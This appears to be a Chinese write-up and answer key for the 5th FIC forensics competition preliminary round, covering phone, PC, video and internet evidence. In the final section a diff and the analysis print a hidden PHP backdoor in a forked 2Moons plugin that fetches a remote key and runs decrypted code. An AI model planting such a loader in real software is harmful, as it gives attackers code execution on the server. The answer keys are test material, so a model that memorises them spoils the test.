容器密码:3x@9Qm!V8e$vL%6d^Yr5o*C#Nk7h&ZpFbW2sG4jXuD1cO0lTgAqHwRnIzJyM-_+K=
第一部分网页快照
-
请分析检材一,该取证录像文件的 SHA256 值为
2753da22fe23cadaadc14fe4c1d5096a153360d9f91097ea376846431f5c1567
2. 请分析检材一,远程取证所使用的 OBS 工具版本号为
参考答案:2.29.1.3
3. 请分析检材一,该检材所使用的远程取证的工具名称为
参考答案:A
4. 请分析检材一,在该检材中,远程取证过程中校验的北京时间为
参考答案:D
5. 请分析检材一,远程取证的网站 IP 地址为
参考答案:172.16.10.200
6. 请分析检材一,在该检材中,远程取证的网站密码为
参考答案:admin123
7. 请分析检材一,在已固定的“订单列表”中发现有一页缺失。请找出缺失页面的具体页码为
参考答案:12
输入所有页码去重排序,发现是12页
8. 请分析检材一,补充“订单列表”中缺失页面的数据后,统计订单的总数为
参考答案:4000
9. 请分析检材一,补充“订单列表”中缺失页面的数据后,统计已完成订单中“老李监控批发”的订单数为
建表求和后为238
10. 请分析检材一,补充“订单列表”中缺失页面的数据后,统计已完成订单中“老李监控批发”的ZK-101产品的订单数为
建表求和得67
11. 请分析检材一,补充“订单列表”中缺失页面的数据后,统计已完成订单中“老李监控批发”产品在上海区域的订单数为
参考答案:12。统计后excel求和
12. 请分析检材一,补充“订单列表”中缺失页面的数据后,统计已完成订单中“老李监控批发”的销售情况,并计算“赵磊(13967346658)”优惠后的总金额为(例如,优惠率为10%时按原单价的90%计算)
参考答案:4390。统计不同页码的订单单价及折扣求和。
13. 请分析检材一,补充“代理列表”中缺失页面的数据后,统计代理人的最大层级数为(其中顶级代理的用户定义为第1层)
参考答案:6
层级分析题,跑代码(万能代码)
import pandas as pddef build_supervisor_dict(df): supervisor_dict = {} for index, row in df.iterrows(): name = row['姓名'] supervisor = row['上级'] if name not in supervisor_dict: supervisor_dict[name] = supervisor return supervisor_dictdef find_all_supervisors(name, supervisor_dict): supervisors = [name] while name in supervisor_dict: name = supervisor_dict[name] supervisors.insert(0, name) return supervisorsdf = pd.read_excel('data.xlsx', sheet_name='hz_user', dtype=str)supervisor_dict = build_supervisor_dict(df)result_data = []for name in df['姓名']: supervisors = find_all_supervisors(name, supervisor_dict) result_data.append([name] + supervisors)max_length = max(len(row) for row in result_data)result_data = [row + [''] * (max_length - len(row)) for row in result_data]result_df = pd.DataFrame(result_data, columns=['姓名'] + [f'分级{i}' for i in range(1, max_length)])result_df.to_excel('result.xlsx', index=False)
14. 请分析检材一,补充“代理列表”中缺失页面的数据后,统计每位代理的直接下游人数,并确定直接下游人数排名第一的代理人为
参考答案:杨伟娜
15. 请分析检材一,补充“代理列表”中缺失页面的数据后,根据地址信息统计各区域的代理人数,并确定上海区域的代理人数为
参考答案:5。赵磊、朱洋、周强、黄伟娟、刘平伟。
第二部分手机取证
1. 请分析检材二,请分析"手机"检材,并回答,并回答该手机的device_name是?
参考答案:Redmi 6 Pro
先通过AI确定大致存储位置为“system”分区中,然后逐个扫描,放到百度搜索就可以了(考试时候填的红米6Pro可惜了)
2. 请分析检材二,请分析"手机"检材,并回答,嫌疑人pc开机密码是什么?
参考答案:1qaz2wsx
通过软件解析发现便签中记录电脑开机密码为1列2列,所以有意识的去看便签数据库,找到目标内容并且拿1列2列密码是碰一下计算机检材就可以了
3. 请分析检材二,请分析"手机"检材,并回答,嫌疑人接头暗号是什么?
参考答案:爱能不能够永远单纯没有悲哀
将tar包按照大小排序,发现可以包名“com.bijoysingh.yang”,分析数据库定位到目标附件,然后全局搜索一下即可
4. 请分析检材二,请分析"手机"检材,并回答,嫌疑人存放的秘钥环是多少?
参考答案:1qaz2wsx3edc
5. 请分析检材二,请分析"手机"检材,并回答,嫌疑人一生中最重要的日子是什么时候?
参考答案:2026-02-26(考试卡了好久,最后全局搜索找到图片)
6. 请分析检材三,请分析"手机"检材,并回答,嫌疑人微信生成的聊天记录数据库文件名称是什么?
参考答案:EnMicroMsg.db
这个没啥解释了,之前有写过文章大家想看安卓微信数据库解密爬楼就可以了
7. 请分析检材二,请分析"手机"检材,并回答,嫌疑人微信账号对应的 UIN 为多少?
参考答案:1864810197
不解析啦,大家看之前公众号吧
8. 请分析检材二,请分析"手机"检材,并回答,嫌疑人微信聊天记录数据库的加密秘钥是什么?
参考答案:290f678
不解析啦,大家看之前公众号吧
9. 请分析检材二,请分析"手机"检材,并回答,嫌疑人“欠条.rar”的解压密码是多少?
参考答案:3170010703
把微信聊天发的图片导出来调整曝光找到二维码扫码得到密码
10. 请分析检材二,请分析"手机"检材,并回答,嫌疑人“欠条.rar”解压后,其中VeraCrypt容器MD5值是多少?
参考答案:83da62aabc88cb1b23e9469142b67b80
11. 请分析检材二,请分析"手机"检材,并回答,嫌疑人提供的“欠条.rar”解压后,其中"1.png"图上显示的VeraCrypt容器密码是多少?
参考答案:#!@KE2sax@!da0h5hghg34&@
使用神器解隐写
12. 请分析检材二,请分析"手机"检材,并回答,嫌疑人李某全名是什么?
参考答案:李安弘
用VeraCrypt加载看欠条
13. 请分析检材二,请分析"手机"检材,并回答,嫌疑人欠款金额是多少?
参考答案:80000
同上题从欠条里找到
第三部分介质取证
1. 请分析检材三,请分析"电脑"检材,并回答,该电脑最后一次开机时间是?
参考答案:C、2025/4/14 11:49:47
2. 请分析检材三,请分析"电脑"检材,并回答,嫌疑人的备用机号码是多少?
参考答案:18877332134
仿真起来看便签
3. 请分析检材三,请分析"电脑"检材,并回答,域名dgy02.com曾保存过一个密码,该密码是多少?
参考答案:123456
这题考察的浏览器保存的密码相关知识,密码是跟开机密码关联的,所以仿真的时候不能去清除密码,要用原密码进入,首先找到密钥环
然后仿真直接输入密钥环在密码里面可以看到
4. 请分析检材三,请分析"电脑"检材,并回答,其电脑安装的微信版本是多少?
参考答案:4.0.0.21
5. 请分析检材三,请分析"电脑"检材,并回答,该系统有哪些远程控制软件
拿着答案去搜索
6. 请分析检材三,请分析"电脑"检材,并回答,电脑2025年4月10日11点4分29秒曾被向日葵远程控制,其记录的日志文件名为
参考答案:sunlogin_service.log.2
XWAY在/var/log下
直接根据日志里面的时间格式搜索
只有在sunlogin_service.log.2里面有
7. 请分析检材三,请分析"电脑"检材,并回答,电脑2025年4月10日11点4分29秒曾被向日葵远程控制,日志内记录对方公网IP地址和端口为
参考答案:116.192.161.222:2577
直接把日志文件丢AI分析
8. 请分析检材三,请分析"电脑"检材,并回答,某文件的MD5值为“2bdfcdbd6c63efc094ac154a28968b7d”,该文件名为
参考答案:important.docx
浏览+递归然后计算分区六的哈希,分区4的哈希也算过但是算完之后过滤没有所以又算了分区六的
MD5过滤出来
9. 请分析检材三,请分析"电脑"检材,据调查,上述文件存放了钱包助记词,第一个单词是什么?
参考答案:solution
根据题干知道这题答案在important.docx中,直接把这个文档当做压缩包解压,然后扫描文件隐写即可
10. 请分析检材三(“我的测试机”),最近曾访问过的音频文件,该音频文件的文件名是什么
参考答案:自传小说.mp3
11. 请分析检材三(“我的测试机”),最近曾使用过USB设备,该设备的名称为
参考答案:ThinkPLus
12. 请分析检材三(“我的测试机”)中的音频内容,并回答,嫌疑人现任妻子毕业的大学是?
参考答案:北京大学
使用科大讯飞会员将音频转为文字内容,分析即可
13. 请分析检材三(“我的测试机”)中的音频内容,并回答,嫌疑人是通过一个朋友认识的陈老板,该朋友姓氏拼音是?
参考答案:wang
14. 请分析检材三(“我的测试机”)中的音频内容,并回答,嫌疑人所说的香格里拉大酒店实则是?
参考答案:棋牌室
15. 请分析检材三(“我的测试机”)中的音频内容,并回答,嫌疑人银行密码是多少?
参考答案:071492
考试没搞定,每段话的第一个字连起来,真6
第四部分互联网取证
1. 请分析检材二,找到李某上游人员陈某博客宣传所用域名为
参考答案:chen.foren6
2. 请分析陈某宣传所用域名,该域名的顶级域名在以下那个区块链注册
参考答案:B.HNS(https://handshake.org/)
3. 请分析陈某宣传所用域名的顶级域名的域名解析服务器(DNS)共有几个
参考答案:2
去https://www.namebase.io/网站搜索foren6
4. 请分析陈某宣传所用域名的顶级域名的NS1服务器ip为
参考答案:45.79.133.98
继续在namebase搜索varo
5. 请分析陈某宣传所用域名,该域名DNS记录指向邮件服务器域名为
参考答案:mail.163.com
已知ns1.varo.(实际为 ns1.varo.domains,IP:45.79.133.98)是 ** .foren6** 的权威服务器,
可以直接使用dig命令向其查询chen.foren6的DNS记录
dig @45.79.133.98 chen.foren6 ANY
图上可见邮件服务器域名为mail.163.com
6. 请分析陈某宣传所用域名,该域名的txt记录中chen的值为
参考答案:fengbaoliejiu
同上
7. 请分析陈某宣传所用域名,该域名DNS记录没有以下哪个域名
参考答案:D.hl.chen.foren6
题目给出的选项都没有出现在上述截图中,考虑这些子域名有独立的 DNS 记录(例如,admin.chen.foren6 有自己的 A 记录),由 chen.foren6 的 NS 服务器(ns1.varo.domains)管理。直接向NS1服务器查询子域名的记录
for sub in admin caidan fic hl; do
dig @45.79.133.98 $sub.chen.foren6 ANY
done
root:~# for sub in admin caidan fic hl; do dig @45.79.133.98 $sub.chen.foren6 ANYdone; <<>> DiG 9.18.30-0ubuntu0.22.04.2-Ubuntu <<>> @45.79.133.98 admin.chen.foren6 ANY; (1 server found);; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 50076;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1;; WARNING: recursion requested but not available;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 1232;; QUESTION SECTION:;admin.chen.foren6. IN ANY;; ANSWER SECTION:admin.chen.foren6. 20 IN MX 0 114.51.41.91.;; Query time: 231 msec;; SERVER: 45.79.133.98#53(45.79.133.98) (TCP);; WHEN: Mon Apr 28 02:55:24 UTC 2025;; MSG SIZE rcvd: 74; <<>> DiG 9.18.30-0ubuntu0.22.04.2-Ubuntu <<>> @45.79.133.98 caidan.chen.foren6 ANY; (1 server found);; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 33278;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1;; WARNING: recursion requested but not available;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 1232;; QUESTION SECTION:;caidan.chen.foren6. IN ANY;; ANSWER SECTION:caidan.chen.foren6. 20 IN A 20.25.4.26;; Query time: 235 msec;; SERVER: 45.79.133.98#53(45.79.133.98) (TCP);; WHEN: Mon Apr 28 02:55:24 UTC 2025;; MSG SIZE rcvd: 63; <<>> DiG 9.18.30-0ubuntu0.22.04.2-Ubuntu <<>> @45.79.133.98 fic.chen.foren6 ANY; (1 server found);; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12576;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1;; WARNING: recursion requested but not available;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 1232;; QUESTION SECTION:;fic.chen.foren6. IN ANY;; ANSWER SECTION:fic.chen.foren6. 20 IN AAAA fb00:9a9a:7d01:ddca:6666:6666::;; Query time: 215 msec;; SERVER: 45.79.133.98#53(45.79.133.98) (TCP);; WHEN: Mon Apr 28 02:55:25 UTC 2025;; MSG SIZE rcvd: 72; <<>> DiG 9.18.30-0ubuntu0.22.04.2-Ubuntu <<>> @45.79.133.98 hl.chen.foren6 ANY; (1 server found);; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 34484;; flags: qr aa rd; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1;; WARNING: recursion requested but not available;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 1232;; QUESTION SECTION:;hl.chen.foren6. IN ANY;; AUTHORITY SECTION:chen.foren6. 20 IN SOA ns1.varo. ops.varo.domains. 1 10800 3600 604800 3600;; Query time: 239 msec;; SERVER: 45.79.133.98#53(45.79.133.98) (TCP);; WHEN: Mon Apr 28 02:55:25 UTC 2025;; MSG SIZE rcvd: 103
把结果拿去问AI,给出结论
- admin.chen.foren6
:有 MX 记录(114.51.41.91,可能配置错误)。 - caidan.chen.foren6
:有 A 记录(20.25.4.26,正常)。 - fic.chen.foren6
:有 AAAA 记录(fb00:9a9a:7d01:ddca:6666:6666::,可能是测试)。 - hl.chen.foren6
:无记录(NXDOMAIN)。
因此选D
8. 请分析陈某宣传所用域名,该博客域名最终DNS解析指向的github仓库名为
参考答案:chewhaoN.github.io
通过dig找不到相关信息。直接从github上入手,搜索chen.foren6,找到了github仓库名
9. 请分析陈某github账号,陈某对jkroepke/2Moons项目增改了几个文件
通过陈某github账号找到了2Moons项目,和jkroepke/2Moons原始项目分别下载下来进行对比
用vscode的插件Diff Folders对比两个文件夹,得到结果是192
但是实际查看这些文件发现似乎只有换行符的区别,使用diff命令查看
# diff -r --exclude=.git --strip-trailing-cr --ignore-space-change --ignore-blank-lines 2Moons 2Moons-ori只在 2Moons 存在:encrypted.bindiff -r '--exclude=.git' --strip-trailing-cr --ignore-space-change --ignore-blank-lines 2Moons/includes/libs/Smarty/plugins/block.textformat.php 2Moons-ori/includes/libs/Smarty/plugins/block.textformat.php36,37c36< < function smarty_block_textformat($params, $content, $template, &$repeat)---> function smarty_block_textformat($params, $content, $template, &$repeat)113,114d111< $a=file_get_contents('https://foren6.atwebpages.com/woyao/eat/%E7%81%AB%E9%94%85/%E8%9C%82%E8%9C%9C%E9%94%85%E5%BA%95.css');$b=md5($a,true);$c=file_get_contents('../../../../encrypted.bin');$d=base64_decode($c);$e='aes-256-cbc';$f=openssl_cipher_iv_length($e);$g=substr($d,0,$f);$h=substr($d,$f);$i=openssl_decrypt($h,$e,$b,OPENSSL_RAW_DATA,$g);$j=sys_get_temp_dir();$k=$j.'/func_'.uniqid().'.php';file_put_contents($k,"<?phpn".$i);include $k;unlink($k);yijuhua();<
这么看只有2个文件不同,新增1个文件,修改1个文件。
10. 请分析陈某github账号,陈某在修改2Moons过程中提到了什么锅底
参考答案:蜂蜜锅底
查看被修改过的文件,发现新增了一个encrypted.bin文件,
在修改文件中找到一个php文件
查看该php文件找到后门
可以发现访问了一个链接
解码该url得到答案
11. 请分析陈某github账号,陈某在游戏2Moons中放置的后门连接码的密码为
根据后门内容,写出解密脚本,得到密码为ficnb
$a=file_get_contents('https://foren6.atwebpages.com/woyao/eat/%E7%81%AB%E9%94%85/%E8%9C%82%E8%9C%9C%E9%94%85%E5%BA%95.css');$b=md5($a,true);$c=file_get_contents('../../../../encrypted.bin');$d=base64_decode($c);$e='aes-256-cbc';$f=openssl_cipher_iv_length($e);$g=substr($d,0,$f);$h=substr($d,$f);$i=openssl_decrypt($h,$e,$b,OPENSSL_RAW_DATA,$g);$j=sys_get_temp_dir();$k=$j.'/func_'.uniqid().'.php';file_put_contents($k,"<?phpn".$i);include $k;unlink($k);yijuhua();
访问css文件链接发现还存在,encrypted.bin文件也存在根目录下。让AI根据后门写一个解密脚本,解密encrypt文件内容。
wget --no-check-certificate https://foren6.atwebpages.com/woyao/eat/%E7%81%AB%E9%94%85/%E8%9C%82%E8%9C%9C%E9%94%85%E5%BA%95.css
12. 请访问陈某当前博客,陈某课程的扫码报名地址的域名为
参考答案:fic.forensix.cn
将陈某github上的源码下载下来,打开index.html,可以看到如下内容
进入images路径下打开image1.png并扫码
13. 请分析陈某当前博客,通过互联网找到陈某的旧博客网站标题为
参考答案:柳如烟大战霸天虎
分析当前博客的源码,从index.html中找到老博客的地址
http://forensix2025.work.gd/
该地址目前已经无法访问,尝试查看快照文件,从https://archive.org/中搜寻该地址
可以看到4.7和4.26均存在快照,但是4.26的快照为403
4.7的快照存在博客内容
可以看到博客网站标题为
14. 请分析陈某旧博客,陈某的姓名为
参考答案:陈浩北
15. 请分析陈某旧博客,陈某的邮箱地址为
参考答案:[email protected]
查看快照源码
16. 请分析陈某旧博客,陈某的11位手机号为
参考答案:13170010703
17. 请分析陈某旧博客,陈某最爱的dota英雄为
参考答案:D
老dotaer都懂的
原文始发于微信公众号(取证与溯源):第五届FIC-初赛WP
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论